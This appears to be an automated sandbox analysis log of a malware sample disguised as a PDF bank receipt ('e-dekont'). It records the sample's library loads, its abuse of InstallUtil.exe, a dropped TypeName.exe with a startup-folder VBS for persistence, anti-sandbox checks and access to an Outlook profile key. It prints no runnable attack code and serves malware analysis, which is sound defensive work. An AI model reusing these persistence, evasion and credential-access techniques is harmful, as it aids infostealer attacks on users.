              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: secur32.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Section loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic file information: File size 1250816 > 1048576
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x130c00
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              Source: e-dekont (72).pdf(#U007e56 KB).exe, RegProcessMock.cs.Net Code: PublishGetter System.AppDomain.Load(byte[])
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, RegProcessMock.cs.Net Code: PublishGetter System.AppDomain.Load(byte[])
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6b60000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2052275949.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E13AEB pushfd ; iretd 0_2_02E13B21
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E13AD7 push ebx; retf 0_2_02E13ADA
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E106C0 push eax; ret 0_2_02E106FA
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E10720 push eax; ret 0_2_02E1072A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E10700 push eax; ret 0_2_02E1070A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E10710 push eax; ret 0_2_02E1071A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD42A8 push ds; retn 0006h0_2_06AD4392
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD36DB push ss; retn 0006h0_2_06AD36F2
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD36D0 push ss; retn 0006h0_2_06AD36D2
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9E31 push edx; retn 0006h0_2_06AD9E32
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9E79 push edx; retn 0006h0_2_06AD9E7A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD37F1 push ss; retn 0006h0_2_06AD37F2
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD3731 push ss; retn 0006h0_2_06AD3732
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD3711 push ss; retn 0006h0_2_06AD3712
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADDCEA push es; retf 0_2_06ADDCE8
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADDCDE push es; retf 0_2_06ADDCE8
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD540B push eax; retn 0006h0_2_06AD5419
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADFC58 pushfd ; retn 001Ah0_2_06ADFC59
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9DF7 push ecx; retn 0006h0_2_06AD9DFA
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADB5C8 push esp; retn 0006h0_2_06ADB5C9
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9D69 push ecx; retn 0006h0_2_06AD9D6A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADDD46 push es; iretd 0_2_06ADDD54
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADC2AA push es; retf 0_2_06ADC2AC
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD3810 push ss; retn 0006h0_2_06AD3812
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AED27B push esp; ret 0_2_06AED282
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE4032 push es; retf 0_2_06AE4034
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B2C3 push FFFFFF8Bh; iretd 0_2_06C3B2C7
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B2AD push FFFFFF8Bh; ret 0_2_06C3B2B0
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B274 push FFFFFF8Bh; ret 0_2_06C3B276
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C34278 push es; ret 0_2_06C3442C
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B3EB push FFFFFF8Bh; iretd 0_2_06C3B3EF
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\TypeName.exeJump to dropped file

              Boot Survival

              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbsJump to dropped file
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbsJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\TypeName.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match | File source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe | Memory allocated: 1570000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe | Memory allocated: 2F40000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe | Memory allocated: 2D70000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: C50000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 29E0000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 1040000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\TypeName.exe | Memory allocated: 1700000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\TypeName.exe | Memory allocated: 3050000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\TypeName.exe | Memory allocated: 5050000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 30F0000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 3320000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 30F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\TypeName.exe | Code function: 4_2_06DA387F rdtsc 4_2_06DA387F
